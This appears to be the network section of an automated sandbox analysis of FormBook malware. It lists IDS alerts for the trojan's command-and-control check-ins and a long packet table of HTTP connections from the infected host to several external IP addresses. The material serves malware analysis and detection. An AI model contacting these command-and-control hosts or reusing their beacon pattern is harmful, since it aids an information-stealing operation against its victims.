                                                          07/02/24-14:04:33.563081TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974780192.168.2.615.197.142.173
                                                          07/02/24-14:05:57.280319TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977280192.168.2.6188.114.97.3
                                                          07/02/24-14:05:28.296564TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976380192.168.2.6135.181.212.206
                                                          07/02/24-14:05:42.763941TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976880192.168.2.6191.6.208.133
                                                          07/02/24-14:03:26.452953TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972480192.168.2.63.33.130.190
                                                          07/02/24-14:04:20.406030TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974380192.168.2.63.33.130.190
                                                          07/02/24-14:03:39.747488TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973080192.168.2.6203.161.43.228

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jul 2, 2024 14:02:54.721012115 CEST4971980192.168.2.665.181.132.158
                                                          Jul 2, 2024 14:02:54.725908041 CEST804971965.181.132.158192.168.2.6
                                                          Jul 2, 2024 14:02:54.725977898 CEST4971980192.168.2.665.181.132.158
                                                          Jul 2, 2024 14:02:54.728878021 CEST4971980192.168.2.665.181.132.158
                                                          Jul 2, 2024 14:02:54.733987093 CEST804971965.181.132.158192.168.2.6
                                                          Jul 2, 2024 14:02:55.701474905 CEST804971965.181.132.158192.168.2.6
                                                          Jul 2, 2024 14:02:55.701879978 CEST804971965.181.132.158192.168.2.6
                                                          Jul 2, 2024 14:02:55.701936007 CEST4971980192.168.2.665.181.132.158
                                                          Jul 2, 2024 14:02:55.704776049 CEST4971980192.168.2.665.181.132.158
                                                          Jul 2, 2024 14:02:55.709909916 CEST804971965.181.132.158192.168.2.6
                                                          Jul 2, 2024 14:03:18.851259947 CEST4972180192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:18.856620073 CEST80497213.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:03:18.856688976 CEST4972180192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:18.858448982 CEST4972180192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:18.863375902 CEST80497213.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:03:19.325089931 CEST80497213.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:03:19.325170040 CEST4972180192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:20.362540960 CEST4972180192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:20.367645025 CEST80497213.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:03:21.380984068 CEST4972280192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:21.387387037 CEST80497223.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:03:21.387505054 CEST4972280192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:21.389283895 CEST4972280192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:21.396045923 CEST80497223.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:03:21.914113045 CEST80497223.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:03:21.914235115 CEST4972280192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:22.893938065 CEST4972280192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:22.899202108 CEST80497223.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:03:23.912728071 CEST4972380192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:23.917794943 CEST80497233.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:03:23.917934895 CEST4972380192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:23.920151949 CEST4972380192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:23.925076962 CEST80497233.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:03:23.925183058 CEST80497233.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:03:24.543814898 CEST80497233.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:03:24.543879986 CEST4972380192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:25.425682068 CEST4972380192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:25.430548906 CEST80497233.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:03:26.442831039 CEST4972480192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:26.451425076 CEST80497243.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:03:26.451502085 CEST4972480192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:26.452953100 CEST4972480192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:26.457937956 CEST80497243.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:03:26.939934969 CEST80497243.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:03:26.940318108 CEST80497243.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:03:26.940366030 CEST4972480192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:26.942730904 CEST4972480192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:26.947510004 CEST80497243.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:03:32.146464109 CEST4972780192.168.2.6203.161.43.228
                                                          Jul 2, 2024 14:03:32.151427031 CEST8049727203.161.43.228192.168.2.6
                                                          Jul 2, 2024 14:03:32.151531935 CEST4972780192.168.2.6203.161.43.228
                                                          Jul 2, 2024 14:03:32.153460026 CEST4972780192.168.2.6203.161.43.228
                                                          Jul 2, 2024 14:03:32.158226013 CEST8049727203.161.43.228192.168.2.6
                                                          Jul 2, 2024 14:03:32.854695082 CEST8049727203.161.43.228192.168.2.6
                                                          Jul 2, 2024 14:03:32.854846001 CEST8049727203.161.43.228192.168.2.6
                                                          Jul 2, 2024 14:03:32.855031967 CEST4972780192.168.2.6203.161.43.228
                                                          Jul 2, 2024 14:03:33.659210920 CEST4972780192.168.2.6203.161.43.228
                                                          Jul 2, 2024 14:03:34.677290916 CEST4972880192.168.2.6203.161.43.228
                                                          Jul 2, 2024 14:03:34.682909966 CEST8049728203.161.43.228192.168.2.6
                                                          Jul 2, 2024 14:03:34.682986975 CEST4972880192.168.2.6203.161.43.228
                                                          Jul 2, 2024 14:03:34.684638023 CEST4972880192.168.2.6203.161.43.228
                                                          Jul 2, 2024 14:03:34.689544916 CEST8049728203.161.43.228192.168.2.6
                                                          Jul 2, 2024 14:03:35.380281925 CEST8049728203.161.43.228192.168.2.6
                                                          Jul 2, 2024 14:03:35.381128073 CEST8049728203.161.43.228192.168.2.6
                                                          Jul 2, 2024 14:03:35.381176949 CEST4972880192.168.2.6203.161.43.228
                                                          Jul 2, 2024 14:03:36.190427065 CEST4972880192.168.2.6203.161.43.228
                                                          Jul 2, 2024 14:03:37.208720922 CEST4972980192.168.2.6203.161.43.228
                                                          Jul 2, 2024 14:03:37.213696003 CEST8049729203.161.43.228192.168.2.6
                                                          Jul 2, 2024 14:03:37.213777065 CEST4972980192.168.2.6203.161.43.228
                                                          Jul 2, 2024 14:03:37.215337992 CEST4972980192.168.2.6203.161.43.228
                                                          Jul 2, 2024 14:03:37.220175028 CEST8049729203.161.43.228192.168.2.6
                                                          Jul 2, 2024 14:03:37.220254898 CEST8049729203.161.43.228192.168.2.6
                                                          Jul 2, 2024 14:03:37.883249998 CEST8049729203.161.43.228192.168.2.6
                                                          Jul 2, 2024 14:03:37.883493900 CEST8049729203.161.43.228192.168.2.6
                                                          Jul 2, 2024 14:03:37.883593082 CEST4972980192.168.2.6203.161.43.228
                                                          Jul 2, 2024 14:03:38.721940994 CEST4972980192.168.2.6203.161.43.228
                                                          Jul 2, 2024 14:03:39.740475893 CEST4973080192.168.2.6203.161.43.228
                                                          Jul 2, 2024 14:03:39.745368958 CEST8049730203.161.43.228192.168.2.6
                                                          Jul 2, 2024 14:03:39.745512009 CEST4973080192.168.2.6203.161.43.228
                                                          Jul 2, 2024 14:03:39.747488022 CEST4973080192.168.2.6203.161.43.228
                                                          Jul 2, 2024 14:03:39.752270937 CEST8049730203.161.43.228192.168.2.6
                                                          Jul 2, 2024 14:03:40.370306969 CEST8049730203.161.43.228192.168.2.6
                                                          Jul 2, 2024 14:03:40.370428085 CEST8049730203.161.43.228192.168.2.6
                                                          Jul 2, 2024 14:03:40.370558023 CEST4973080192.168.2.6203.161.43.228
                                                          Jul 2, 2024 14:03:40.373230934 CEST4973080192.168.2.6203.161.43.228
                                                          Jul 2, 2024 14:03:40.378037930 CEST8049730203.161.43.228192.168.2.6
                                                          Jul 2, 2024 14:03:46.195955992 CEST4973180192.168.2.638.47.158.215
                                                          Jul 2, 2024 14:03:46.200786114 CEST804973138.47.158.215192.168.2.6
                                                          Jul 2, 2024 14:03:46.200885057 CEST4973180192.168.2.638.47.158.215
                                                          Jul 2, 2024 14:03:46.202683926 CEST4973180192.168.2.638.47.158.215
                                                          Jul 2, 2024 14:03:46.207545996 CEST804973138.47.158.215192.168.2.6
                                                          Jul 2, 2024 14:03:47.009485960 CEST804973138.47.158.215192.168.2.6
                                                          Jul 2, 2024 14:03:47.009526968 CEST804973138.47.158.215192.168.2.6
                                                          Jul 2, 2024 14:03:47.009573936 CEST4973180192.168.2.638.47.158.215
                                                          Jul 2, 2024 14:03:47.706020117 CEST4973180192.168.2.638.47.158.215
                                                          Jul 2, 2024 14:03:48.724919081 CEST4973280192.168.2.638.47.158.215
                                                          Jul 2, 2024 14:03:48.729752064 CEST804973238.47.158.215192.168.2.6
                                                          Jul 2, 2024 14:03:48.729835987 CEST4973280192.168.2.638.47.158.215
                                                          Jul 2, 2024 14:03:48.731627941 CEST4973280192.168.2.638.47.158.215
                                                          Jul 2, 2024 14:03:48.736423016 CEST804973238.47.158.215192.168.2.6
                                                          Jul 2, 2024 14:03:49.550014973 CEST804973238.47.158.215192.168.2.6
                                                          Jul 2, 2024 14:03:49.550055027 CEST804973238.47.158.215192.168.2.6
                                                          Jul 2, 2024 14:03:49.550209045 CEST4973280192.168.2.638.47.158.215
                                                          Jul 2, 2024 14:03:50.237258911 CEST4973280192.168.2.638.47.158.215
                                                          Jul 2, 2024 14:03:51.256469011 CEST4973380192.168.2.638.47.158.215
                                                          Jul 2, 2024 14:03:51.261595011 CEST804973338.47.158.215192.168.2.6
                                                          Jul 2, 2024 14:03:51.261672974 CEST4973380192.168.2.638.47.158.215
                                                          Jul 2, 2024 14:03:51.263981104 CEST4973380192.168.2.638.47.158.215
                                                          Jul 2, 2024 14:03:51.268773079 CEST804973338.47.158.215192.168.2.6
                                                          Jul 2, 2024 14:03:51.268925905 CEST804973338.47.158.215192.168.2.6
                                                          Jul 2, 2024 14:03:52.768523932 CEST4973380192.168.2.638.47.158.215
                                                          Jul 2, 2024 14:03:52.774097919 CEST804973338.47.158.215192.168.2.6
                                                          Jul 2, 2024 14:03:52.774152040 CEST4973380192.168.2.638.47.158.215
                                                          Jul 2, 2024 14:03:53.787391901 CEST4973480192.168.2.638.47.158.215
                                                          Jul 2, 2024 14:03:53.792416096 CEST804973438.47.158.215192.168.2.6
                                                          Jul 2, 2024 14:03:53.792593002 CEST4973480192.168.2.638.47.158.215
                                                          Jul 2, 2024 14:03:53.795146942 CEST4973480192.168.2.638.47.158.215
                                                          Jul 2, 2024 14:03:53.799983978 CEST804973438.47.158.215192.168.2.6
                                                          Jul 2, 2024 14:03:54.622292042 CEST804973438.47.158.215192.168.2.6
                                                          Jul 2, 2024 14:03:54.622309923 CEST804973438.47.158.215192.168.2.6
                                                          Jul 2, 2024 14:03:54.622510910 CEST4973480192.168.2.638.47.158.215
                                                          Jul 2, 2024 14:03:54.625696898 CEST4973480192.168.2.638.47.158.215
                                                          Jul 2, 2024 14:03:54.630465984 CEST804973438.47.158.215192.168.2.6
                                                          Jul 2, 2024 14:03:59.653645039 CEST4973580192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:59.658443928 CEST80497353.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:03:59.658574104 CEST4973580192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:59.661139011 CEST4973580192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:03:59.665966034 CEST80497353.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:00.212635040 CEST80497353.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:00.217161894 CEST4973580192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:01.174824953 CEST4973580192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:01.180181980 CEST80497353.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:02.194140911 CEST4973680192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:02.199073076 CEST80497363.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:02.199227095 CEST4973680192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:02.203135967 CEST4973680192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:02.207866907 CEST80497363.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:02.705724001 CEST80497363.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:02.705782890 CEST4973680192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:03.707149029 CEST4973680192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:03.712081909 CEST80497363.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:04.726207018 CEST4973780192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:04.731141090 CEST80497373.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:04.731228113 CEST4973780192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:04.733908892 CEST4973780192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:04.738873959 CEST80497373.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:04.739099979 CEST80497373.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:05.207896948 CEST80497373.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:05.207953930 CEST4973780192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:06.237205982 CEST4973780192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:06.243539095 CEST80497373.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:07.256486893 CEST4973880192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:07.261409998 CEST80497383.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:07.261486053 CEST4973880192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:07.263535976 CEST4973880192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:07.268296003 CEST80497383.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:07.741681099 CEST80497383.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:07.741764069 CEST80497383.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:07.744353056 CEST4973880192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:07.751113892 CEST4973880192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:07.755878925 CEST80497383.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:12.782568932 CEST4974080192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:12.788769960 CEST80497403.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:12.788839102 CEST4974080192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:12.790901899 CEST4974080192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:12.797379971 CEST80497403.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:13.279630899 CEST80497403.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:13.279681921 CEST4974080192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:14.301114082 CEST4974080192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:14.306972980 CEST80497403.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:15.324238062 CEST4974180192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:15.329169035 CEST80497413.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:15.329229116 CEST4974180192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:15.330939054 CEST4974180192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:15.340439081 CEST80497413.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:16.807508945 CEST80497413.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:16.807564020 CEST4974180192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:16.846560955 CEST4974180192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:16.851288080 CEST80497413.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:17.867117882 CEST4974280192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:17.871967077 CEST80497423.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:17.872112989 CEST4974280192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:17.874100924 CEST4974280192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:17.878912926 CEST80497423.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:17.878989935 CEST80497423.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:18.359683990 CEST80497423.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:18.359749079 CEST4974280192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:19.383125067 CEST4974280192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:19.388005018 CEST80497423.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:20.398339987 CEST4974380192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:20.403553963 CEST80497433.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:20.403626919 CEST4974380192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:20.406029940 CEST4974380192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:20.410991907 CEST80497433.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:20.890474081 CEST80497433.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:20.890886068 CEST80497433.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:20.890930891 CEST4974380192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:20.893943071 CEST4974380192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:20.898703098 CEST80497433.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:25.943686008 CEST4974480192.168.2.615.197.142.173
                                                          Jul 2, 2024 14:04:25.948519945 CEST804974415.197.142.173192.168.2.6
                                                          Jul 2, 2024 14:04:25.950248003 CEST4974480192.168.2.615.197.142.173
                                                          Jul 2, 2024 14:04:25.953110933 CEST4974480192.168.2.615.197.142.173
                                                          Jul 2, 2024 14:04:25.957935095 CEST804974415.197.142.173192.168.2.6
                                                          Jul 2, 2024 14:04:26.444986105 CEST804974415.197.142.173192.168.2.6
                                                          Jul 2, 2024 14:04:26.445075989 CEST804974415.197.142.173192.168.2.6
                                                          Jul 2, 2024 14:04:26.445133924 CEST4974480192.168.2.615.197.142.173
                                                          Jul 2, 2024 14:04:27.458009958 CEST4974480192.168.2.615.197.142.173
                                                          Jul 2, 2024 14:04:28.481102943 CEST4974580192.168.2.615.197.142.173
                                                          Jul 2, 2024 14:04:28.486347914 CEST804974515.197.142.173192.168.2.6
                                                          Jul 2, 2024 14:04:28.486428976 CEST4974580192.168.2.615.197.142.173
                                                          Jul 2, 2024 14:04:28.488751888 CEST4974580192.168.2.615.197.142.173
                                                          Jul 2, 2024 14:04:28.493843079 CEST804974515.197.142.173192.168.2.6
                                                          Jul 2, 2024 14:04:28.960928917 CEST804974515.197.142.173192.168.2.6
                                                          Jul 2, 2024 14:04:28.961652040 CEST804974515.197.142.173192.168.2.6
                                                          Jul 2, 2024 14:04:28.961704969 CEST4974580192.168.2.615.197.142.173
                                                          Jul 2, 2024 14:04:30.003087044 CEST4974580192.168.2.615.197.142.173
                                                          Jul 2, 2024 14:04:31.021821022 CEST4974680192.168.2.615.197.142.173
                                                          Jul 2, 2024 14:04:31.026724100 CEST804974615.197.142.173192.168.2.6
                                                          Jul 2, 2024 14:04:31.026791096 CEST4974680192.168.2.615.197.142.173
                                                          Jul 2, 2024 14:04:31.029099941 CEST4974680192.168.2.615.197.142.173
                                                          Jul 2, 2024 14:04:31.033961058 CEST804974615.197.142.173192.168.2.6
                                                          Jul 2, 2024 14:04:31.033972025 CEST804974615.197.142.173192.168.2.6
                                                          Jul 2, 2024 14:04:31.503010988 CEST804974615.197.142.173192.168.2.6
                                                          Jul 2, 2024 14:04:31.503072977 CEST804974615.197.142.173192.168.2.6
                                                          Jul 2, 2024 14:04:31.507322073 CEST4974680192.168.2.615.197.142.173
                                                          Jul 2, 2024 14:04:32.534178019 CEST4974680192.168.2.615.197.142.173
                                                          Jul 2, 2024 14:04:33.552968979 CEST4974780192.168.2.615.197.142.173
                                                          Jul 2, 2024 14:04:33.559357882 CEST804974715.197.142.173192.168.2.6
                                                          Jul 2, 2024 14:04:33.559444904 CEST4974780192.168.2.615.197.142.173
                                                          Jul 2, 2024 14:04:33.563081026 CEST4974780192.168.2.615.197.142.173
                                                          Jul 2, 2024 14:04:33.568232059 CEST804974715.197.142.173192.168.2.6
                                                          Jul 2, 2024 14:04:34.054696083 CEST804974715.197.142.173192.168.2.6
                                                          Jul 2, 2024 14:04:34.054816961 CEST804974715.197.142.173192.168.2.6
                                                          Jul 2, 2024 14:04:34.055223942 CEST4974780192.168.2.615.197.142.173
                                                          Jul 2, 2024 14:04:34.060058117 CEST4974780192.168.2.615.197.142.173
                                                          Jul 2, 2024 14:04:34.064804077 CEST804974715.197.142.173192.168.2.6
                                                          Jul 2, 2024 14:04:40.422211885 CEST4974880192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:40.427043915 CEST8049748108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:40.427109957 CEST4974880192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:40.429023981 CEST4974880192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:40.433929920 CEST8049748108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:41.023118019 CEST8049748108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:41.023209095 CEST8049748108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:41.023263931 CEST4974880192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:41.943105936 CEST4974880192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:42.999644041 CEST4974980192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:43.005254030 CEST8049749108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:43.005358934 CEST4974980192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:43.015467882 CEST4974980192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:43.020292997 CEST8049749108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:43.604095936 CEST8049749108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:43.604166985 CEST8049749108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:43.604249954 CEST4974980192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:44.518663883 CEST4974980192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:45.539098978 CEST4975080192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:45.544001102 CEST8049750108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:45.547161102 CEST4975080192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:45.551078081 CEST4975080192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:45.556952000 CEST8049750108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:45.556962967 CEST8049750108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:46.147147894 CEST8049750108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:46.147418976 CEST8049750108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:46.147541046 CEST4975080192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:47.065431118 CEST4975080192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:48.087079048 CEST4975180192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:48.092152119 CEST8049751108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:48.093378067 CEST4975180192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:48.099148989 CEST4975180192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:48.104055882 CEST8049751108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:48.686291933 CEST8049751108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:48.687143087 CEST8049751108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:48.687201977 CEST4975180192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:48.689558029 CEST4975180192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:48.694384098 CEST8049751108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:53.715130091 CEST4975280192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:53.720154047 CEST80497523.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:53.720241070 CEST4975280192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:53.723051071 CEST4975280192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:53.728070021 CEST80497523.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:54.219724894 CEST80497523.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:54.223128080 CEST4975280192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:55.237306118 CEST4975280192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:55.242460012 CEST80497523.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:56.256659031 CEST4975380192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:56.261666059 CEST80497533.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:56.262161970 CEST4975380192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:56.265100002 CEST4975380192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:56.271491051 CEST80497533.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:56.736021996 CEST80497533.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:56.736159086 CEST4975380192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:57.771042109 CEST4975380192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:57.776289940 CEST80497533.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:58.818437099 CEST4975480192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:58.824039936 CEST80497543.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:58.824126005 CEST4975480192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:58.828634977 CEST4975480192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:58.834156990 CEST80497543.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:58.834187984 CEST80497543.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:59.313087940 CEST80497543.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:59.313257933 CEST4975480192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:05:00.331186056 CEST4975480192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:05:00.336133003 CEST80497543.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:05:01.350438118 CEST4975580192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:05:01.355314016 CEST80497553.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:05:01.355402946 CEST4975580192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:05:01.357569933 CEST4975580192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:05:01.362379074 CEST80497553.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:05:01.825535059 CEST80497553.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:05:01.825612068 CEST80497553.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:05:01.825983047 CEST4975580192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:05:01.831067085 CEST4975580192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:05:01.835912943 CEST80497553.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:05:07.138763905 CEST4975680192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:07.143594027 CEST804975687.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:07.143667936 CEST4975680192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:07.146040916 CEST4975680192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:07.151015043 CEST804975687.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:07.903883934 CEST804975687.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:07.903908014 CEST804975687.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:07.911093950 CEST4975680192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:08.658957958 CEST4975680192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:09.679044008 CEST4975780192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:09.683892012 CEST804975787.236.19.243192.168.2.6
                                                          Jul 2, 2024 14:05:09.688976049 CEST4975780192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:09.688976049 CEST4975780192.168.2.687.236.19.243
                                                          Jul 2, 2024 14:05:09.694431067 CEST804975787.236.19.243192.168.2.6
